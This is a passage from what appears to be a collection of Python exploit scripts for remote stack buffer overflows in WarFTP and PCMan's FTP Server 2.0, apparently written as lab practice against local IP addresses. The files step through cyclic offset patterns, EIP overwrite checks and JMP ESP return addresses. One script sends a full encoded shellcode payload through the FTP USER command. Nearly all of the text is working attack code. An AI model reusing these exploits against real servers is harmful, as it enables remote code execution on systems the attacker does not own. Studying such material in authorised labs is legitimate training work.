is 0x77559BFF 34 | #module to jump to is 0x7C9D30D7 35 | #address is 00AFFD48 36 | #eip is at byte 485 37 | #esp is at byte 493, eight bytes away 38 | #buffer = "A" * 1100 39 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 40 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 41 | connect=s.connect(('11.11.11.6',21)) 42 | response = s.recv(1024) 43 | print response 44 | s.send('USER ' + buffer + '\r\n') 45 | response = s.recv(1024) 46 | print response 47 | s.send('PASS PASSWORD\r\n') 48 | s.close() 49 | -------------------------------------------------------------------------------- /warftp/ftpexploitbreakpointjumpespthirdgo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | 5 | shellcode = ("\x33\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81" + 6 | "\x76\x0e\xc0\xaf\x22\x1e\x83\xee\xfc\xe2\xf4\x3c\x47" + 7 | "\xa0\x1e\xc0\xaf\x42\x97\x25\x9e\xe2\x7a\x4b\xff\x12" + 8 | "\x95\x92\xa3\xa9\x4c\xd4\x24\x50\x36\xcf\x18\x68\x38" + 9 | "\xf1\x50\x8e\x22\xa1\xd3\x20\x32\xe0\x6e\xed\x13\xc1" + 10 | "\x68\xc0\xec\x92\xf8\xa9\x4c\xd0\x24\x68\x22\x4b\xe3" + 11 | "\x33\x66\x23\xe7\x23\xcf\x91\x24\x7b\x3e\xc1\x7c\xa9" + 12 | "\x57\xd8\x4c\x18\x57\x4b\x9b\xa9\x1f\x16\x9e\xdd\xb2" + 13 | "\x01\x60\x2f\x1f\x07\x97\xc2\x6b\x36\xac\x5f\xe6\xfb" + 14 | "\xd2\x06\x6b\x24\xf7\xa9\x46\xe4\xae\xf1\x78\x4b\xa3" + 15 | "\x69\x95\x98\xb3\x23\xcd\x4b\xab\xa9\x1f\x10\x26\x66" + 16 | "\x3a\xe4\xf4\x79\x7f\x99\xf5\x73\xe1\x20\xf0\x7d\x44" + 17 | "\x4b\xbd\xc9\x93\x9d\xc7\x11\x2c\xc0\xaf\x4a\x69\xb3" + 18 | "\x9d\x7d\x4a\xa8\xe3\x55\x38\xc7\x50\xf7\xa6\x50\xae" + 19 | "\x22\x1e\xe9\x6b\x76\x4e\xa8\x86\xa2\x75\xc0\x50\xf7" + 20 | "\x74\xc8\xf6\x72\xfc\x3d\xef\x72\x5e\x90\xc7\xc8\x11" + 21 | "\x1f\x4f\xdd\xcb\x57\xc7\x20\x1e\xd1\xf3\xab\xf8\xaa" + 22 | "\xbf\x74\x49\xa8\x6d\xf9\x29\xa7\x50\xf7\x49\xa8\x18" + 23 | "\xcb\x26\x3f\x50\xf7\x49\xa8\xdb\xce\x25\x21\x50\xf7" + 24 | "\x49\x57\xc7\x57\x70\x8d\xce\xdd\xcb\xa8\xcc\x4f\x7a" + 25 | "\xc0\x26\xc1\x49\x97\xf8\x13\xe8\xaa\xbd\x7b\x48\x22" + 26 | "\x52\x44\xd9\x84\x8b\x1e\x1f\xc1\x22\x66\x3a\xd0\x69" + 27 | "\x22\x5a\x94\xff\x74\x48\x96\xe9\x74\x50\x96\xf9\x71" + 28 | "\x48\xa8\xd6\xee\x21\x46\x50\xf7\x97\x20\xe1\x74\x58" + 29 | "\x3f\x9f\x4a\x16\x47\xb2\x42\xe1\x15\x14\xd2\xab\x62" + 30 | "\xf9\x4a\xb8\x55\x12\xbf\xe1\x15\x93\x24\x62\xca\x2f" + 31 | "\xd9\xfe\xb5\xaa\x99\x59\xd3\xdd\x4d\x74\xc0\xfc\xdd" + 32 | "\xcb") 33 | 34 | 35 | buffer = "A" * 485 + "\x59\x54\xc3\x77" + "C" * 4 + "\x81\xc4\x24\xfa\xff\xff" + shellcode 36 | 37 | #actual module to jump to is 0x77c35459 38 | #module to jump to is 0x77559BFF 39 | #module to jump to is 0x7C9D30D7 40 | #address is 00AFFD48 41 | #eip is at byte 485 42 | #esp is at byte 493, eight bytes away 43 | #buffer = "A" * 1100 44 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 45 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 46 | connect=s.connect(('11.11.11.6',21)) 47 | response = s.recv(1024) 48 | print response 49 | s.send('USER ' + buffer + '\r\n') 50 | response = s.recv(1024) 51 | print response 52 | s.send('PASS PASSWORD\r\n') 53 | s.close() 54 | -------------------------------------------------------------------------------- /warftp/ftpexploitshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | buffer = "A" * 485 + "\xD7\x30\x9D\x7C" + "C" * 4 + "D" * 607 4 | 5 | #module to jump to is 0x7C9D30D7 6 | #address is 00AFFD48 7 | #eip is at byte 485 8 | #esp is at byte 493, eight bytes away 9 | #buffer = "A" * 1100 10 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | connect=s.connect(('11.11.11.6',21)) 13 | response = s.recv(1024) 14 | print response 15 | s.send('USER ' + buffer + '\r\n') 16 | response = s.recv(1024) 17 | print response 18 | s.send('PASS PASSWORD\r\n') 19 | s.close() 20 | -------------------------------------------------------------------------------- /warftp/ftpexploitverifybreakpoint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | buffer = "A" * 485 + "B" * 4 + "C" * 611 4 | #buffer = "A" * 1100 5 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 6 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 7 | connect=s.connect(('11.11.11.6',21)) 8 | response = s.recv(1024) 9 | print response 10 | s.send('USER ' + buffer + '\r\n') 11 | response = s.recv(1024) 12 | print response 13 | s.send('PASS PASSWORD\r\n') 14 | s.close() 15 | -------------------------------------------------------------------------------- /win7PCman/pcman1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # 4 | #################################################################### 5 | # 6 | # Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit 7 | # Date: 2013/6/26 8 | # Exploit Author: Chako 9 | # Vendor Homepage: http://pcman.openfoundry.org/ 10 | # Software Download Link: https://files.secureserver.net/1sMltFOsytirTG 11 | # Version: 2.0 12 | # Tested on: Windows 7 SP1 English 13 | # 14 | # EAX 00000000 15 | # ECX 00830A70 16 | # EDX 00000030 17 | # EBX 00000000 18 | # ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA 19 | # EBP 01F214A0 20 | # ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA 21 | # EDI 00000004 22 | # EIP 41414141 23 | # 24 | #################################################################### 25 | 26 | import socket 27 | import sys 28 | 29 | USER = "anonymous" 30 | PASSWD = "TEST" 31 | 32 | PAYLOAD = "A" * 3000 33 | 34 | #EIP = "\xDB\xFC\x1C\x75" # 751CFCDB JMP ESP USER32.DLL 35 | #NOP = "\x90" * 10 36 | 37 | #SHELLCODE =() 38 | print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit") 39 | print("[+] Version: V2.0") 40 | print("[+] Chako\n\n\n") 41 | 42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | s.connect(("11.11.11.9",21)) 44 | data = s.recv(1024) 45 | 46 | 47 | print("[-] Login to FTP Server...\n") 48 | s.send("USER " + USER + '\r\n') 49 | data = s.recv(1024) 50 | 51 | s.send("PASS " + PASSWD + '\r\n') 52 | data = s.recv(1024) 53 | 54 | 55 | 56 | print("[-] Sending exploit...\n") 57 | #s.send(PAYLOAD + EIP + NOP +SHELLCODE +'\r\n') 58 | s.send(PAYLOAD +'\r\n') 59 | s.close() 60 | 61 | print("[!] Done! Exploit successfully sent\n") 62 | -------------------------------------------------------------------------------- /win7PCman/pcman2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # 4 | #################################################################### 5 | # 6 | # Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit 7 | # Date: 2013/6/26 8 | # Exploit Author: Chako 9 | # Vendor Homepage: http://pcman.openfoundry.org/ 10 | # Software Download Link: https://files.secureserver.net/1sMltFOsytirTG 11 | # Version: 2.0 12 | # Tested on: Windows 7 SP1 English 13 | # 14 | # EAX 00000000 15 | # ECX 00830A70 16 | # EDX 00000030 17 | # EBX 00000000 18 | # ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA 19 | # EBP 01F214A0 20 | # ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA 21 | # EDI 00000004 22 | # EIP 41414141 23 | # 24 | #################################################################### 25 | 26 | import socket 27 | import sys 28 | 29 | USER = "anonymous" 30 | PASSWD = "TEST" 31 | 32 | #PAYLOAD = "A" * 3000 33 | PAYLOAD = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" 34 | #EIP = "\xDB\xFC\x1C\x75" # 751CFCDB JMP ESP USER32.DLL 35 | #NOP = "\x90" * 10 36 | 37 | #SHELLCODE =() 38 | print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit") 39 | print("[+] Version: V2.0") 40 | print("[+] Chako\n\n\n") 41 | 42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | s.connect(("11.11.11.9",21)) 44 | data = s.recv(1024) 45 | 46 | 47 | print("[-] Login to FTP Server...\n") 48 | s.send("USER " + USER + '\r\n') 49 | data = s.recv(1024) 50 | 51 | s.send("PASS " + PASSWD + '\r\n') 52 | data = s.recv(1024) 53 | 54 | 55 | 56 | print("[-] Sending exploit...\n") 57 | #s.send(PAYLOAD + EIP + NOP +SHELLCODE +'\r\n') 58 | s.send(PAYLOAD +'\r\n') 59 | s.close() 60 | 61 | print("[!] Done! Exploit successfully sent\n") 62 | -------------------------------------------------------------------------------- /win7PCman/pcman3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # 4 | #################################################################### 5 | # 6 | # Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit 7 | # Date: 2013/6/26 8 | # Exploit Author: Chako 9 | # Vendor Homepage: http://pcman.openfoundry.org/ 10 | # Software Download Link: https://files.secureserver.net/1sMltFOsytirTG 11 | # Version: 2.0 12 | # Tested on: Windows 7 SP1 English 13 | # 14 | # EAX 00000000 15 | # ECX 00830A70 16 | # EDX 00000030 17 | # EBX 00000000 18 | # ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA 19 | # EBP 01F214A0 20 | # ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA 21 | # EDI 00000004 22 | # EIP 41414141 23 | # 24 | #################################################################### 25 | 26 | import socket 27 | import sys 28 | 29 | USER = "anonymous" 30 | PASSWD = "TEoST" 31 | RET = "B" * 4 32 | PAYLOAD = "A" * 2010 33 | #PAYLOAD = 